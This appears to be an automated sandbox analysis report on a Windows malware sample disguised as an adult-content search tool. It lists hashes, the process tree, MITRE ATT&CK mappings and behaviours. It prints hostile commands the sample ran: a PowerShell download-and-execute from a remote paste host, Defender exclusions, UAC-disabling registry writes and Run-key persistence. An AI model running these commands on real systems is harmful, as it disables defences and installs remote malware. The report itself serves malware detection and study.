Analysis
- max time kernel: 42s
- max time network: 47s
- platform: windows11-21h2_x64
- resource: win11-20240802-en
- resource tags: arch:x64, arch:x86, image:win11-20240802-en, locale:en-us, os:windows11-21h2-x64, system
- submitted: 02/10/2024, 12:01
Static task: static1

General
- Target: Hentai_and_Nudes_searcher.exe
- Size: 437KB
- MD5: 70e761e3048bc3b921ab2313199fd74f
- SHA1: 1be4deee7db5645d1e42c8e0583d3f67d5907066
- SHA256: 8f244860702e6ec3d0de412de629e827bff49b641e59d71557ff3559e60c59f4
- SHA512: a6ca91827a3ead93b473beb380b4f757bf6140e05022a601e84362b47d46078cb14231261f6953aa5ebe7024f7fc2b8cf617b2d4f31149273da945893c85bf83
- SSDEEP: 12288:Jl8/sjCS8Oajo23qfmk56LBdwYPfYW7CjKmPvsnxC8fE85M16YTTKEmCj5iZSazW:EVYXKgij
Malware Config
Signatures
UAC bypass
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" (powershell.exe)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" (powershell.exe)
Blocklisted process makes network request 4 IoCs
- flow 2: powershell.exe (PID 4628)
- flow 3: powershell.exe (PID 4628)
- flow 5: powershell.exe (PID 4628)
- flow 6: powershell.exe (PID 4628)
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
- powershell.exe (PID 4944)
- powershell.exe (PID 1316)
- powershell.exe (PID 4628)
Downloads MZ/PE file
Executes dropped EXE 4 IoCs
- Updates.exe (PID 1164)
- nds.exe (PID 3880)
- chromedrivers.exe (PID 2456)
- chromedrivers.exe (PID 3224)
resource / yara_rule
- behavioral1/files/0x000c00000002aa8a-102.dat: vmprotect
- behavioral1/memory/1164-109-0x000002349D2D0000-0x000002349D31C000-memory.dmp: vmprotect
- behavioral1/files/0x000100000002aac2-133.dat: vmprotect
- behavioral1/memory/2456-140-0x0000000000A00000-0x0000000001A44000-memory.dmp: vmprotect
Adds Run key to start application 2 TTPs 2 IoCs
- Set value (str) \REGISTRY\USER\S-1-5-21-970747758-134341002-3585657277-1000\Software\Microsoft\Windows\CurrentVersion\Run\Updates = "C:\\Users\\Admin\\AppData\\Local\\Updates.exe" (Updates.exe)
- Set value (str) \REGISTRY\USER\S-1-5-21-970747758-134341002-3585657277-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Updates = "C:\\Users\\Admin\\AppData\\Local\\Updates.exe" (Updates.exe)
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
- flow 16: discord.com
- flow 1: discord.com
- flow 9: discord.com
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
- flow 1: ipecho.net
- flow 7: ipecho.net
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 13 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
  Processes (13 events, in order): Hentai_and_Nudes_searcher.exe, net.exe, powershell.exe, powershell.exe, wmic.exe, wmic.exe, net1.exe, powershell.exe, nds.exe, chromedrivers.exe, wmic.exe, chromedrivers.exe, wmic.exe
Detects videocard installed 1 TTPs 2 IoCs
Uses WMIC.exe to determine videocard installed.
- wmic.exe (PID 1688)
- wmic.exe (PID 3220)
Runs net.exe
Suspicious behavior: EnumeratesProcesses 7 IoCs
- powershell.exe (PID 4944), 2 events
- powershell.exe (PID 1316), 2 events
- powershell.exe (PID 4628), 2 events
- Updates.exe (PID 1164), 1 event
Suspicious use of AdjustPrivilegeToken 64 IoCs
- powershell.exe (PID 4944): SeDebugPrivilege
- powershell.exe (PID 1316): SeDebugPrivilege
- powershell.exe (PID 4628): SeDebugPrivilege
- Updates.exe (PID 1164): SeDebugPrivilege
- Hentai_and_Nudes_searcher.exe (PID 4660): SeDebugPrivilege
- nds.exe (PID 3880): SeDebugPrivilege
- wmic.exe (PID 4996), the following set recorded twice: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
- wmic.exe (PID 1688): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege
Suspicious use of WriteProcessMemory 38 IoCs
(source PID and process, target PID, procid_target, number of events)
- 4660 Hentai_and_Nudes_searcher.exe wrote to memory of 1240 (target 80), 3 events
- 1240 net.exe wrote to memory of 852 (target 82), 3 events
- 4660 Hentai_and_Nudes_searcher.exe wrote to memory of 4944 (target 83), 3 events
- 4660 Hentai_and_Nudes_searcher.exe wrote to memory of 1316 (target 85), 3 events
- 4660 Hentai_and_Nudes_searcher.exe wrote to memory of 4628 (target 87), 3 events
- 4628 powershell.exe wrote to memory of 1164 (target 89), 2 events
- 4628 powershell.exe wrote to memory of 3880 (target 90), 3 events
- 1164 Updates.exe wrote to memory of 2456 (target 91), 3 events
- 2456 chromedrivers.exe wrote to memory of 4996 (target 92), 3 events
- 2456 chromedrivers.exe wrote to memory of 1688 (target 95), 3 events
- 2456 chromedrivers.exe wrote to memory of 3224 (target 97), 3 events
- 3224 chromedrivers.exe wrote to memory of 4920 (target 98), 3 events
- 3224 chromedrivers.exe wrote to memory of 3220 (target 100), 3 events
Processes
- C:\Users\Admin\AppData\Local\Temp\Hentai_and_Nudes_searcher.exe (PID 4660)
  Command line: "C:\Users\Admin\AppData\Local\Temp\Hentai_and_Nudes_searcher.exe"
  Signatures: System Location Discovery: System Language Discovery; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\net.exe (PID 1240)
    Command line: "net" session
    Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\net1.exe (PID 852)
      Command line: C:\Windows\system32\net1 session
      Signatures: System Location Discovery: System Language Discovery
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 4944)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionProcess \"powershell.exe\""
    Signatures: Command and Scripting Interpreter: PowerShell; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1316)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath \"C:\Windows\System32\WindowsPowerShell\v1.0\\""
    Signatures: Command and Scripting Interpreter: PowerShell; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 4628)
    Command line: "powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-Expression(Invoke-WebRequest -Uri \"http://pastebinlol.serv00.net/pastes/somepower14.txt\").Content"
    Signatures: UAC bypass; Blocklisted process makes network request; Command and Scripting Interpreter: PowerShell; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Users\Admin\AppData\Local\Updates.exe (PID 1164)
      Command line: "C:\Users\Admin\AppData\Local\Updates.exe"
      Signatures: Executes dropped EXE; Adds Run key to start application; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - C:\Users\Admin\AppData\Local\chromedrivers.exe (PID 2456)
        Command line: "C:\Users\Admin\AppData\Local\chromedrivers.exe"
        Signatures: Executes dropped EXE; System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
        - C:\Windows\SysWOW64\Wbem\wmic.exe (PID 4996)
          Command line: "wmic" csproduct get uuid
          Signatures: System Location Discovery: System Language Discovery; Suspicious use of AdjustPrivilegeToken
        - C:\Windows\SysWOW64\Wbem\wmic.exe (PID 1688)
          Command line: "wmic" path win32_VideoController get name
          Signatures: System Location Discovery: System Language Discovery; Detects videocard installed; Suspicious use of AdjustPrivilegeToken
        - C:\Users\Admin\AppData\Local\chromedrivers.exe (PID 3224)
          Command line: "C:\Users\Admin\AppData\Local\chromedrivers.exe"
          Signatures: Executes dropped EXE; System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
          - C:\Windows\SysWOW64\Wbem\wmic.exe (PID 4920)
            Command line: "wmic" csproduct get uuid
            Signatures: System Location Discovery: System Language Discovery
          - C:\Windows\SysWOW64\Wbem\wmic.exe (PID 3220)
            Command line: "wmic" path win32_VideoController get name
            Signatures: System Location Discovery: System Language Discovery; Detects videocard installed
    - C:\Users\Admin\AppData\Local\Temp\nds.exe (PID 3880)
      Command line: "C:\Users\Admin\AppData\Local\Temp\nds.exe"
      Signatures: Executes dropped EXE; System Location Discovery: System Language Discovery; Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
- Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
- Impair Defenses (1): Disable or Modify Tools (1)
- Modify Registry (2)
Downloads
- Filesize: 2KB
  MD5: d0c46cad6c0778401e21910bd6b56b70
  SHA1: 7be418951ea96326aca445b8dfe449b2bfa0dca6
  SHA256: 9600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02
  SHA512: 057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949
- Filesize: 18KB
  MD5: 2e9e5c1b0ec6b52883a21f03e6ca1b2e
  SHA1: c8a911afb0a6a0dedb8e670afb2c5cea7bd666e8
  SHA256: 0dfa680a59128dc0b270626ea427a4e41684da075e573916f3b2670fa878a91d
  SHA512: 4ff62072925884305b4e3c03a57501f9038351d2b56dfca737df10ed924aa4fc2a8a07570908cf67db95ba0d6e0cdb3b45d9d8a03f036de68e1376b532654a97
- Filesize: 18KB
  MD5: 9ec70c93e5ae911a9ba6cb4aaf598323
  SHA1: 50bce84ce7492e27395df07588b1fd94f5cc3675
  SHA256: ae5e2fe13fe7b8ab738ccdafdc18409045423da2503b852cf7c1d6f23e4c6f47
  SHA512: 51cf96ebd7d79e6bbd6d40c4f4ac19d389e27074c947c32a889faa5773723764ac9b9e03d135af7baf87cc82ba05584bcaad4489ab070379b657aa6b26e3d4c6
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- Filesize: 439KB
  MD5: ea3e56db72a8f96003a188e664621fae
  SHA1: 20e228520187983faf42c94d2a8de448c1878221
  SHA256: 89f59a737962ce32482dd6f733d19a780031b469b5cd21a3bddea6426258aa5f
  SHA512: ad90d569c6e72528f8b18442c3edd75e9fad4110e08e5b32e4f3ef7f570e6eccf4d6e1da95e05d9323296e4e8c208ed2c08f38f9292b6477028873df1ac9bc93
- Filesize: 254KB
  MD5: 50df586c92d6ceb442599d20e015b357
  SHA1: 1d2071089bdc091d06fb1bb4e458cf7ca3dd1276
  SHA256: 4e435463689beff07ef6b17b8d6559d68a1f21e62bf652cc28cc6d6535da4310
  SHA512: cb0dbe51fee3f15227234470c53fd61b848a7177a31929ec1b5275f9bb7528e87370433c8113f0352af62250e121e5d5e08dc15b67d9126976d5e12744c5953f
- Filesize: 10.8MB
  MD5: 71e905772d3d65b1c93e25fd03c88235
  SHA1: 0edea1290d45e427cd7be43abfab11d085a5c2e3
  SHA256: 9526227a851d1ce70a2a444c4c7ee7de2c5bf6206a42decaad8d65c3ff0b61d9
  SHA512: 71af02434d64350218cec31dd13eb7baa285411d74707d29aa114033e996bfb6dc81b19eec89dd21f1103b798ded83cd089adeb690fbc48fdf62cbce3b91d924